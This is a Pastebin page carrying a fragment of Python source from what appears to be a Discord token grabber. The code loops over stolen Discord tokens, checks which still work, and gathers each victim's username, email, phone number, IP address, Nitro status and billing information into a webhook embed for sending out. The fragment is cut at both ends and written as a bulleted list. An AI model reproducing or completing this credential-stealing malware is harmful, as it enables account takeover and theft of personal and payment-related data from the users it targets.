Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- continue
- checked.append(token)
- uid = None
- if not token.startswith("mfa."):
- try:
- uid = b64decode(token.split(".")[0].encode()).decode()
- except:
- pass
- if not uid or uid in working_ids:
- continue
- user_data = getuserdata(token)
- if not user_data:
- continue
- working_ids.append(uid)
- working.append(token)
- username = user_data["username"] + "#" + str(user_data["discriminator"])
- user_id = user_data["id"]
- avatar_id = user_data["avatar"]
- avatar_url = getavatar(user_id, avatar_id)
- email = user_data.get("email")
- phone = user_data.get("phone")
- nitro = bool(user_data.get("premium_type"))
- billing = bool(has_payment_methods(token))
- embed = {
- "color": 0x0078ff,
- "fields": [
- {
- "name": "**ᅠ**",
- "value": f'ᅠ',
- "inline": False
- },
- {
- "name": "**Email**",
- "value": f' {email}',
- "inline": False
- },
- {
- "name": "**ᅠ**",
- "value": f'ᅠ',
- "inline": False
- },
- {
- "name": "**Número**",
- "value": f' {phone}',
- "inline": False
- },
- {
- "name": "**ᅠ**",
- "value": f'ᅠ',
- "inline": False
- },
- {
- "name": "**Ip**",
- "value": f' {ip}',
- "inline": False
- },
- {
- "name": "**ᅠ**",
- "value": f'ᅠ',
- "inline": False
- },
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement